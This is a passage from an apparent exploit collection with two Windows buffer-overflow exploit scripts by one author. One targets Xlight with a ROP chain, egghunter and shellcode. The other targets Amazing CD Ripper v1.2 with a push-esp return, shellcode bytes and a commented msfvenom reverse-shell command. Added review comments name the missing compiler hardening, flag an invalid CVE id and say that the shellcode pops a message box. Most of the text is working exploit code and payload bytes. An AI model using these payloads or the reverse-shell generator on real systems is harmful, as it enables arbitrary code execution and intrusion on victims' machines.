OS Dll | Version, Modulename & Path<br />##-----------------------------------------------------------------------------------------------------------------------------------------<br />## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True | True | True | False | True | 10.0.17763.1 [SHLWAPI.dll] (C:\Windows\System32\SHLWAPI.dll)<br />## 0x76970000 | 0x76a93000 | 0x00123000 | True | True | True | False | True | 10.0.17763.1490 [ucrtbase.dll] (C:\Windows\System32\ucrtbase.dll)<br />## 0x766a0000 | 0x766bc000 | 0x0001c000 | True | True | True | False | True | 10.0.17763.1075 [profapi.dll] (C:\Windows\System32\profapi.dll)<br />## 0x76340000 | 0x763c0000 | 
0x00080000 | True | True | True | False | True | 10.0.17763.1 [msvcp_win.dll] (C:\Windows\System32\msvcp_win.dll)<br />## 0x75680000 | 0x757ea000 | 0x0016a000 | True | True | True | False | True | 10.0.17763.1879 [gdi32full.dll] (C:\Windows\System32\gdi32full.dll)<br />## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True | True | True | False | True | 10.0.17763.1 [CRYPT32.dll] (C:\Windows\System32\CRYPT32.dll)<br />## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True | True | True | False | True | 10.0.17763.1 [kernel.appcore.dll] (C:\Windows\System32\kernel.appcore.dll)<br />## 0x00400000 | 0x006d5000 | 0x002d5000 | False | False | False | False | False | 3.9.3.2 [xlight.exe] (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />## NOTE(review): xlight.exe is the only module in this table with Rebase, SafeSEH and ASLR all False; linking the product with /DYNAMICBASE, /SAFESEH and /NXCOMPAT is the vendor-side hardening this table points to.<br />## 0x74870000 | 0x74909000 | 0x00099000 | True | True | True | False | True | 10.0.17763.1075 [ODBC32.dll] (C:\Windows\SYSTEM32\ODBC32.dll)<br />## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True | True | True | False | True | 10.0.17763.1 [apphelp.dll] (C:\Windows\SYSTEM32\apphelp.dll)<br />## 0x76280000 | 0x76297000 | 0x00017000 | True | True | True | False | True | 10.0.17763.1 [win32u.dll] (C:\Windows\System32\win32u.dll)<br />## 0x75c50000 | 0x761a6000 | 0x00556000 | True | True | True | False | True | 10.0.17763.1911 [SHELL32.dll] (C:\Windows\System32\SHELL32.dll)<br /><br /><br />##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 
(C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br /># RopFunc syscall null <br /># Bytes the author lists as unusable in the input; the list is never referenced again, so the script does not verify the payload against it.<br />badchars = [0x00,0x0a,0x0d,0x3a,0xff]<br /><br /># Author-supplied shellcode bytes; the script records no generation command or payload description for them.<br />buf = b""<br />buf += b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"<br />buf += b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"<br />buf += b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"<br />buf += b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"<br />buf += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"<br />buf += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"<br />buf += b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"<br />buf += b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"<br />buf += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"<br />buf += b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"<br />buf += b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\xef"<br />buf += b"\xce\xe0\x60\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"<br />buf += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"<br />buf += b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"<br />buf += b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"<br />buf += b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68"<br />buf += b"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c"<br />buf += b"\x24\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x61\x69\x72"<br />buf += b"\x79\x68\x61\x70\x20\x5a\x68\x20\x48\x65\x6a\x68\x30"<br />buf += b"\x64\x61\x79\x31\xc9\x88\x4c\x24\x10\x89\xe1\x31\xd2"<br />buf += b"\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"<br /><br /><br />def Hejap_rop_chain():<br /> """Pack the gadget list below as little-endian 32-bit values. Every address is annotated REBASED / ASLR by the author, i.e. it was read from an ASLR-enabled system DLL on the capture machine and is tied to that machine's layout."""<br /><br /> Hejap_gadgets = [<br /> 0x75c4f468, # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR <br /> 0x7731c2a0, # ptr to &VirtualProtect() [IAT 
CRYPT32.dll] ** REBASED ** ASLR<br /> 0x75deb176, # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR <br /> #[---INFO:gadgets_to_set_ebp:---]<br /> 0x7545eebb, # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR <br /> 0x75ff2bdb, # & call esp [msvcp_win.dll] ** REBASED ** ASLR<br /> #[---INFO:gadgets_to_set_ebx:---]<br /> 0x755d53b2, # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR <br /> 0xfffffdff, # Value to negate, will become 0x00000201<br /> 0x74d241d7, # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR <br /> 0x75e72ff1, # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR <br /> #[---INFO:gadgets_to_set_edx:---]<br /> 0x765a2dad, # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR <br /> 0xffffffc0, # Value to negate, will become 0x00000040<br /> 0x75297b65, # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR <br /> 0x76a3b05a, # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR <br /> #[---INFO:gadgets_to_set_ecx:---]<br /> 0x72bb29ef, # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR <br /> 0x7774f16b, # &Writable location [ntdll.dll] ** REBASED ** ASLR<br /> #[---INFO:gadgets_to_set_edi:---]<br /> 0x77275d3d, # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR <br /> 0x75849686, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR<br /> #[---INFO:gadgets_to_set_eax:---]<br /> 0x72bf2465, # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR <br /> 0x90909090, # nop<br /> #[---INFO:pushad:---]<br /> 0x76a37959, # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR <br /> ]<br /> return ''.join(struct.pack('<I', _) for _ in Hejap_gadgets)<br /><br />egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"<br />egg+="\xef\xb8\x68\x30\x30\x70\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"<br />rop_chain = Hejap_rop_chain()<br />offset = 452<br />nseh = "\x90" * 4 <br />junk = "A" * (offset - len(nseh))<br />stackpivot = struct.pack('<I', 0x8e648b26 ) # POP ESP # POP EBP # RETN ** [xlight.exe<br />#seh = 
struct.pack('<I', 0x0019ccb8 ) null<br /><br /># Assemble the file contents in the author's order and write them out in text mode ("w").<br />buffer = junk + nseh + stackpivot + rop_chain + "\x90" * 5 + egg + 'h00ph00p' + buf + "\x90" * (1000 - len(egg)-len(stackpivot))<br />f = open("0day_hejap.txt", "w")<br />f.write(buffer)<br />f.close()<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/jMURHQF.png<br />https://i.imgur.com/aw6hZo2.png<br />#Video<br />https://streamable.com/gmqz5x<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow <br /># Exploit Author: Hejap Zairy<br /># Date: 03.08.2022<br /># Software Link: http://www.shelltoys.com/cd_ripper.exe<br /># Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe<br /># Tested Version: v1.2.1<br /># Tested on: Windows 10 64bit<br /><br /># 1.- Run python code : 0day-Hejap_Zairy.py<br /># 2.- Open 0day_Hejap.txt and copy All content to Clipboard<br /># 3.- Open Amazing CD Ripper and press Enter Code<br /># 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'<br /># 5.- Click 'OK'<br /><br /># Author Code By Hejap Zairy<br />#CVE-2022-0x515<br /># NOTE(review): "CVE-2022-0x515" is not a valid CVE identifier (CVE IDs use decimal digits, CVE-YYYY-NNNN); treat the line as a placeholder, not a reference.<br />#!/usr/bin/env python<br /># Purpose: writes one crafted string to 0day_Hejap.txt; the steps above paste that file into the application's 'Enter Code' field.<br /><br />from pwn import *<br /># Only p32 is used from pwntools (third-party, not part of the standard library).<br /><br />buffer = "\x41" * 1016 <br /># Defender note: the fixed address below lives in akrip32.dll, which the author's annotation records as shipping without ASLR, Rebase or SafeSEH; rebuilding that DLL with those mitigations enabled is the vendor-side fix the annotation implies.<br /># 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll)<br /><br />push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll<br />nops = "\x90" * 15 #515 tshhh theardlooo love Malware <br /># Generation commands recorded by the author; the bytes below end with the strings "0day Hejap Zairy" and "MessageBox", so they correspond to the second (messagebox) command, not the reverse-shell one.<br />#msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff" <br />#msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff"<br />buf = b""<br />buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"<br />buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"<br />buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"<br />buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"<br />buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"<br />buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"<br />buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"<br />buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"<br />buf += 
b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"<br />buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"<br />buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"<br />buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"<br />buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"<br />buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"<br />buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"<br />buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"<br />buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"<br />buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"<br />buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"<br />buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"<br />buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"<br />buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"<br />buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"<br />buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"<br />buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"<br /># padding is sized from len(buffer) (1016, set above) minus the two pieces already emitted; buf itself is not subtracted.<br />padding ="C" * (len(buffer) - len(push_esp) - len(nops))<br />payload = buffer + push_esp + nops + buf + padding<br /># Write the payload; the bare except below catches every exception type and prints only a generic message, hiding the real cause.<br />try:<br /> with open("0day_Hejap.txt","wb") as f:<br /> print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))<br /> f.write(payload)<br /> # redundant: the with statement already closes f<br /> f.close()<br /> print("[+] File created!")<br />except:<br /> print("[-]File cannot be created")<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/3r5sKNo.png<br /><br /></code></pre>